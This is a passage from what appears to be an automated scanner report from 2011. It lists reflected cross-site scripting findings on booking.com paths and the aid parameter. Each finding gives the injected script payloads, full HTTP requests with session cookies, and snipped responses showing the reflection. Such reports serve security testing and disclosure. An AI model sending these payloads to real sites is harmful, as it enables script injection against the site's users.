<link rel="canonical" href="http://www.booking.com/hotel/us/copley-square.en.html?5695f"><script>alert(1)</script>df25147b85d=1" />
...[SNIP]...

4.204. http://www.booking.com/load_times [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /load_times

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53495'%3balert(1)//0c7dd70f369 was submitted in the REST URL parameter 1. This input was echoed as 53495';alert(1)//0c7dd70f369 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

PUT /load_times53495'%3balert(1)//0c7dd70f369 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
Content-Length: 59
Origin: http://www.booking.com
X-Booking-AID: 335591
X-Booking-Pageview-Id: 118b01157ba2001b
X-Requested-With: XMLHttpRequest
X-Booking-Session-Id: 9fcdaabed9e2bb46b60772539b0ca101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

jquery_ready=59508&window_onload=67479&pid=118b01157ba2001b

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:11:24 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 51742
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
g.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/load_times53495';alert(1)//0c7dd70f369';
booking.env.b_canonical_url_delimiter = '?';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.env.close_button = "C
...[SNIP]...

4.205. http://www.booking.com/load_times [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /load_times

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 415f0"><script>alert(1)</script>faf880f0642 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

PUT /load_times415f0"><script>alert(1)</script>faf880f0642 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
Content-Length: 59
Origin: http://www.booking.com
X-Booking-AID: 335591
X-Booking-Pageview-Id: 118b01157ba2001b
X-Requested-With: XMLHttpRequest
X-Booking-Session-Id: 9fcdaabed9e2bb46b60772539b0ca101
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

jquery_ready=59508&window_onload=67479&pid=118b01157ba2001b

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:11:19 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 51826
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/load_times415f0"><script>alert(1)</script>faf880f0642" />
...[SNIP]...

4.206. http://www.booking.com/logo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /logo

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc7af"><script>alert(1)</script>9d469f9415c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /logobc7af"><script>alert(1)</script>9d469f9415c?ver=1;t=13176005551 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:11:16 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 51870
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/logobc7af"><script>alert(1)</script>9d469f9415c" />
...[SNIP]...

4.207. http://www.booking.com/logo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /logo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56a5f'%3balert(1)//e19a29d99f8 was submitted in the REST URL parameter 1. This input was echoed as 56a5f';alert(1)//e19a29d99f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /logo56a5f'%3balert(1)//e19a29d99f8?ver=1;t=13176005551 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:11:20 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 51786
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
booking.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/logo56a5f';alert(1)//e19a29d99f8?t=13176005551;ver=1';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.e
...[SNIP]...

4.208. http://www.booking.com/searchresults.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31914"><script>alert(1)</script>d10a246203a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html31914"><script>alert(1)</script>d10a246203a?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:24:37 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59378
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/searchresults.html31914"><script>alert(1)</script>d10a246203a" />
...[SNIP]...

4.209. http://www.booking.com/searchresults.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc195'%3balert(1)//0fd97c24ba8 was submitted in the REST URL parameter 1. This input was echoed as bc195';alert(1)//0fd97c24ba8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.htmlbc195'%3balert(1)//0fd97c24ba8?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:24:40 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59294
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
e_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.htmlbc195';alert(1)//0fd97c24ba8?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.gro
...[SNIP]...

4.210. http://www.booking.com/searchresults.html [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16594</script><script>alert(1)</script>dbafd62ac0 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=33559116594</script><script>alert(1)</script>dbafd62ac0&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
